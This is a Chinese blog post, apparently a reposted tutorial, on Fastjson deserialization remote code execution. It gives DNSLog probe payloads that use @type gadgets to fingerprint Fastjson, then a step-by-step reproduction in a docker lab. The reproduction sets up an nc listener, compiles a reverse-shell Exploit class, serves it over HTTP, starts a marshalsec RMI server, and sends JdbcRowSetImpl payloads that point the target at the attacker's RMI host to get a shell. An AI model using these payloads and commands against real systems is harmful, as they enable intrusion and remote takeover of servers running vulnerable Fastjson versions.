Fastjson反序列化_fastjson反序列化什么时候去解析域名dns
赞
踩
欢迎去我的博客查看原文:http://www.xpshuai.cn/posts/21856/
简介
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。可以通过反序列化导致远程命令执行。
漏洞检测方法
DNSLog回显
下面有多个请求,分别放到请求数据包部分(可能某个不适用, 多试几个),通过构造DNS解析来判断是否是Fastjson,Fastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显,以此判断是不是Fastjson
{"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}
{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"xxx.dnslog.cn"}}""}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:"aaa"}
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
增加key
Java语言中常用的Json处理主要是Fastjson和Jackson,相对而言,Jackson比较严格,强制Key和JavaBean属性对齐,只能少Key不能多Key,所以可以通过增加一个Key看响应包会不会报错来判断。
利用复现
这里用的docker环境
1.查看数据包,可以用上面的漏洞检测的方法来判断
2.vps用nc监听端口8888
nc -lvvp 8888
- 1
EXP地址:https://github.com/CaijiOrz/fastjson-1.2.47-RCE
3.修改exp中反弹shell的服务器地址和为我们的
4.使用javac进行编译,然后会生成一个Exploit.class文件
javac Exploit.java
- 1
5.在Exploit.class的目录下开启python的简单http服务,相当于访问就能下载
python -m SimpleHTTPServer 8080
- 1
6.执行下面的命令开启RMI/LDAP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.43.102:8080/#Exploit" 9999 #8080是前面SimpleHTTPServer的端口
- 1
- 2
7.构造exp请求包
# 1.2.47以下版本 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.43.102:9999/Exploit", "autoCommit":true } } # 1.2.24以下版本 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://同上类文件地址:9999/TouchFile", "autoCommit":true } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
8.构造好的请求包发送如下,注意:Content-type格式要json,并且是post请求
Content-type: application/json
- 1
9.接收到反弹回来的shell
参考:https://www.naraku.cn/posts/86.html
